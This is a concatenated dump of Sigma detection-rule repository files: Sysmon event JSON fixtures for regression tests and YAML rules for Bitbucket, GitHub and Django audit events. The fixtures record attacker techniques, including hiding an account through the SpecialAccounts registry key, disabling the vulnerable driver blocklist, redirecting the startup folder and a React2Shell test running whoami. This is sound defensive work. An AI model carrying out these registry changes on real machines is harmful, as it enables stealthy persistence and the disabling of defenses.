regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, 
"Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-31T05:06:45.377630Z" } }, "EventRecordID": 657154, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3080, "ThreadID": 4948 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-31 05:06:45.377", "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", "ProcessId": 5244, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\AtomicOperator$", "Details": "DWORD (0x00000000)", "User": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/info.yml ================================================ id: 3c14b160-a7f5-49a4-beb2-575b70f599b9 description: N/A date: 2025-10-31 author: SigmaHQ Team rule_metadata: - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd title: Hiding User Account Via SpecialAccounts Registry Key regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, 
"Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-01-05T06:29:01.086253Z" } }, "EventRecordID": 74886, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3636, "ThreadID": 4340 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2026-01-05 06:29:01.070", "ProcessGuid": "0197231E-7211-694F-D001-000000000C00", "ProcessId": 9524, "Image": "C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup", "Details": "C:\\Test\\calc.exe", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/info.yml ================================================ id: 0a756043-828b-47af-9863-3eeb6939c54d description: N/A date: 2026-01-05 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 9c226817-8dc9-46c2-a58d-66655aafd7dc title: Modify User Shell Folders Startup Value regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, 
"Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-23T02:22:32.926365Z" } }, "EventRecordID": 90931, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3320, "ThreadID": 4216 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-12-23 02:22:32.922", "ProcessGuid": "0197231E-FCE8-6949-4010-000000000D00", "ProcessId": 17728, "Image": "C:\\WINDOWS\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable", "Details": "DWORD (0x00000000)", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/info.yml ================================================ id: 329ecd6e-38a9-4bab-a75f-66854af61019 description: N/A date: 2025-12-23 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: d526c60a-e236-4011-b165-831ffa52ab70 title: Windows Vulnerable Driver Blocklist Disabled regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.evtx ================================================ FILE: regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 16, "Version": 3, 
"Level": 4, "Task": 16, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:33:08.092105Z" } }, "EventRecordID": 11738, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 8932, "ThreadID": 1540 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-21-3960063115-309473240-3247002503-500" } } }, "EventData": { "UtcTime": "2025-10-24 23:33:08.088", "Configuration": "C:\\Users\\Administrator\\Downloads\\sysmonconfig-trace.xml", "ConfigurationFileHash": "SHA256=B977839264146AFDE215D41182F78F153F9198EBA8EF0B88426239C33FBDA945" } } } ================================================ FILE: regression_data/rules/windows/sysmon/sysmon_config_modification/info.yml ================================================ id: 54f3ccdd-e1f9-4b9f-8dda-b1bdcb13d6ba description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 8ac03a65-6c84-4116-acad-dc1558ff7a77 title: Sysmon Configuration Change regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx ================================================ FILE: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-06T21:11:02.649150Z" } }, 
"EventRecordID": 67583, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3904, "ThreadID": 4272 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-06 21:11:02.632", "ProcessGuid": "0197231E-9BE6-6934-5301-000000000B00", "ProcessId": 3412, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.26100.2454 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"whoami\"", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\CVE-2025-55182-main\\CVE-2025-55182-main\\test-server\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-99CA-6934-A8EB-010000000000", "LogonId": "0x1eba8", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF", "ParentProcessGuid": "0197231E-9B6B-6934-2B01-000000000B00", "ParentProcessId": 1092, "ParentImage": "C:\\Users\\xodih\\AppData\\Local\\Temp\\bun-node-274e01c73\\node.exe", "ParentCommandLine": "C:\\Users\\xodih\\AppData\\Local\\Temp\\bun-node-274e01c73\\node.exe C:\\Users\\xodih\\Downloads\\CVE-2025-55182-main\\CVE-2025-55182-main\\test-server\\node_modules\\next\\dist\\server\\lib\\start-server.js", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/info.yml ================================================ id: b6598f67-233f-4e7e-839d-2379a44fc63e description: N/A date: 2025-12-06 author: Swachchhanda Shrawan Poudel (Nextron Systems) 
rule_metadata: - id: 271de298-cc0e-4842-acd8-079a0a99ea65 title: Suspicious Child Process from Node.js Server - React2Shell regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.evtx ================================================ FILE: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-26T05:11:27.927693Z" } }, "EventRecordID": 142649, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-26 05:11:27.908", "ProcessGuid": "0197231E-8BFF-6926-1308-000000000D00", "ProcessId": 10116, "Image": "C:\\Users\\xodih\\Downloads\\GRB_NET.exe", "FileVersion": "1.1.3.0", "Description": "GRB_NT", "Product": "GRB_NT", "Company": "Zabbix", "OriginalFileName": "GRB_NET.exe", "CommandLine": "GRB_NET.exe -m:scan -i:f -d:list.txt", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-B736-6923-645E-3B0000000000", "LogonId": "0x3b5e64", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": 
"MD5=88DF27B6E794E3FD5F93F28B1CA1D3D0,SHA256=F8810179AB033A9B79CD7006C1A74FBCDE6ED0451C92FBB8C7CE15B52499353A,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", "ParentProcessGuid": "0197231E-A1BD-6925-C705-000000000D00", "ParentProcessId": 7972, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/info.yml ================================================ id: 78005a80-bbfd-475c-a4b2-f562a7b0fecf description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: af688c76-4ce4-4309-bfdd-e896f01acf27 title: Grixba Malware Reconnaissance Activity regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.evtx ================================================ FILE: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 7, "Version": 3, "Level": 4, "Task": 7, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T07:40:10.165324Z" } }, "EventRecordID": 571146, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4272 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, 
"EventData": { "RuleName": "-", "UtcTime": "2025-11-27 07:40:10.132", "ProcessGuid": "0197231E-005A-6928-A50B-000000000D00", "ProcessId": 4460, "Image": "C:\\Windows\\System32\\WerFaultSecure.exe", "ImageLoaded": "C:\\Windows\\System32\\dbgcore.dll", "FileVersion": "10.0.26100.7019 (WinBuild.160101.0800)", "Description": "Windows Core Debugging Helpers", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "DBGCORE.DLL", "Hashes": "SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C", "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml ================================================ id: 63b16abe-2d5c-4a2f-b0ae-f1bc4580e40c description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.evtx ================================================ FILE: rules/README.md ================================================ TBD ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml ================================================ title: Bitbucket Full Data Export Triggered id: 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8 status: test description: Detects when full data export is attempted. 
references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.collection - attack.t1213.003 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Data pipeline' auditType.action: 'Full data export triggered' condition: selection falsepositives: - Legitimate user activity. level: high ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml ================================================ title: Bitbucket Global Permission Changed id: aac6c4f4-87c7-4961-96ac-c3fd3a42c310 status: test description: Detects global permissions change activity. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.persistence - attack.privilege-escalation - attack.t1098 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Permissions' auditType.action: - 'Global permission remove request' - 'Global permission removed' - 'Global permission granted' - 'Global permission requested' condition: selection falsepositives: - Legitimate user activity. 
level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml ================================================ title: Bitbucket Global Secret Scanning Rule Deleted id: e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05 status: test description: Detects Bitbucket global secret scanning rule deletion activity. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: bitbucket service: audit definition: 'Requirements: "Basic" log level is required to receive these audit events.' detection: selection: auditType.category: 'Global administration' auditType.action: 'Global secret scanning rule deleted' condition: selection falsepositives: - Legitimate user activity. level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml ================================================ title: Bitbucket Global SSH Settings Changed id: 16ab6143-510a-44e2-a615-bdb80b8317fc status: test description: Detects Bitbucket global SSH access configuration changes. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.lateral-movement - attack.defense-evasion - attack.t1562.001 - attack.t1021.004 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' 
detection: selection: auditType.category: 'Global administration' auditType.action: 'SSH settings changed' condition: selection falsepositives: - Legitimate user activity. level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml ================================================ title: Bitbucket Audit Log Configuration Updated id: 6aa12161-235a-4dfb-9c74-fe08df8d8da1 status: test description: Detects changes to the bitbucket audit log configuration. references: - https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: bitbucket service: audit definition: 'Requirements: "Basic" log level is required to receive these audit events.' detection: selection: auditType.category: 'Auditing' auditType.action: 'Audit log configuration updated' condition: selection falsepositives: - Legitimate user activity. level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml ================================================ title: Bitbucket Project Secret Scanning Allowlist Added id: 42ccce6d-7bd3-4930-95cd-e4d83fa94a30 status: test description: Detects when a secret scanning allowlist rule is added for projects. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: bitbucket service: audit definition: 'Requirements: "Basic" log level is required to receive these audit events.' 
detection: selection: auditType.category: 'Projects' auditType.action: 'Project secret scanning allowlist rule added' condition: selection falsepositives: - Legitimate user activity. level: low ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml ================================================ title: Bitbucket Secret Scanning Exempt Repository Added id: b91e8d5e-0033-44fe-973f-b730316f23a1 status: test description: Detects when a repository is exempted from the secret scanning feature. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: bitbucket service: audit definition: 'Requirements: "Basic" log level is required to receive these audit events.' detection: selection: auditType.category: 'Repositories' auditType.action: 'Secret scanning exempt repository added' condition: selection falsepositives: - Legitimate user activity. level: high ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml ================================================ title: Bitbucket Secret Scanning Rule Deleted id: ff91e3f0-ad15-459f-9a85-1556390c138d status: test description: Detects when a secret scanning rule is deleted for a project or repository. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: bitbucket service: audit definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection: selection: auditType.category: - 'Projects' - 'Repositories' auditType.action: - 'Project secret scanning rule deleted' - 'Repository secret scanning rule deleted' condition: selection falsepositives: - Legitimate user activity. level: low ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml ================================================ title: Bitbucket Unauthorized Access To A Resource id: 7215374a-de4f-4b33-8ba5-70804c9251d3 status: test description: Detects unauthorized access attempts to a resource. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.resource-development - attack.t1586 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Security' auditType.action: 'Unauthorized access to a resource' condition: selection falsepositives: - Access attempts to non-existent repositories or due to outdated plugins. In most cases the "Anonymous" user is reported in the "author.name" field. level: critical ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml ================================================ title: Bitbucket Unauthorized Full Data Export Triggered id: 34d81081-03c9-4a7f-91c9-5e46af625cde status: test description: Detects when a full data export is attempted by an unauthorized user.
references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.collection - attack.resource-development - attack.t1213.003 - attack.t1586 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Data pipeline' auditType.action: 'Unauthorized full data export triggered' condition: selection falsepositives: - Unlikely level: critical ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml ================================================ title: Bitbucket User Details Export Attempt Detected id: 5259cbf2-0a75-48bf-b57a-c54d6fabaef3 status: test description: Detects user data export activity. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.collection - attack.reconnaissance - attack.discovery - attack.t1213 - attack.t1082 - attack.t1591.004 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Users and groups' auditType.action: - 'User permissions export failed' - 'User permissions export started' - 'User permissions exported' condition: selection falsepositives: - Legitimate user activity. 
level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml ================================================ title: Bitbucket User Login Failure id: 70ed1d26-0050-4b38-a599-92c53d57d45a status: test description: | Detects user authentication failure events. Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.credential-access - attack.t1078.004 - attack.t1110 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Authentication' auditType.action: 'User login failed' condition: selection falsepositives: - Legitimate users entering a wrong password. level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml ================================================ title: Bitbucket User Login Failure Via SSH id: d3f90469-fb05-42ce-b67d-0fded91bbef3 status: test description: | Detects SSH user login access failures. Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field.
references: - https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html - https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.lateral-movement - attack.credential-access - attack.t1021.004 - attack.t1110 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Authentication' auditType.action: 'User login failed(SSH)' condition: selection falsepositives: - Legitimate user wrong password attempts. level: medium ================================================ FILE: rules/application/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml ================================================ title: Bitbucket User Permissions Export Attempt id: 87cc6698-3e07-4ba2-9b43-a85a73e151e2 status: test description: Detects user permission data export attempt. references: - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html - https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html author: Muhammad Faisal (@faisalusuf) date: 2024-02-25 tags: - attack.reconnaissance - attack.collection - attack.discovery - attack.t1213 - attack.t1082 - attack.t1591.004 logsource: product: bitbucket service: audit definition: 'Requirements: "Advance" log level is required to receive these audit events.' detection: selection: auditType.category: 'Users and groups' auditType.action: - 'User details export failed' - 'User details export started' - 'User details exported' condition: selection falsepositives: - Legitimate user activity. 
level: medium ================================================ FILE: rules/application/django/appframework_django_exceptions.yml ================================================ title: Django Framework Exceptions id: fd435618-981e-4a7c-81f8-f78ce480d616 status: stable description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts references: - https://docs.djangoproject.com/en/1.11/ref/exceptions/ - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security author: Thomas Patzke date: 2017-08-05 modified: 2020-09-01 tags: - attack.initial-access - attack.t1190 logsource: category: application product: django detection: keywords: - SuspiciousOperation # Subclasses of SuspiciousOperation - DisallowedHost - DisallowedModelAdminLookup - DisallowedModelAdminToField - DisallowedRedirect - InvalidSessionKey - RequestDataTooBig - SuspiciousFileOperation - SuspiciousMultipartForm - SuspiciousSession - TooManyFieldsSent # Further security-related exceptions - PermissionDenied condition: keywords falsepositives: - Application bugs level: medium ================================================ FILE: rules/application/github/audit/github_delete_action_invoked.yml ================================================ title: Github Delete Action Invoked id: 16a71777-0b2e-4db7-9888-9d59cb75200b status: test description: Detects delete action in the Github audit logs for codespaces, environment, project and repo. author: Muhammad Faisal (@faisalusuf) date: 2023-01-19 references: - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions tags: - attack.impact - attack.collection - attack.t1213.003 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. 
You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' detection: selection: action: - 'codespaces.delete' - 'environment.delete' - 'project.delete' - 'repo.destroy' condition: selection falsepositives: - Validate that the deletion activity is permitted. The "actor" field needs to be validated. level: medium ================================================ FILE: rules/application/github/audit/github_disable_high_risk_configuration.yml ================================================ title: Github High Risk Configuration Disabled id: 8622c92d-c00e-463c-b09d-fd06166f6794 status: test description: Detects when a user disables a critical security feature for an organization. references: - https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions - https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise author: Muhammad Faisal (@faisalusuf) date: 2023-01-29 modified: 2024-07-22 tags: - attack.credential-access - attack.defense-evasion - attack.persistence - attack.t1556 logsource: product: github service: audit definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs.
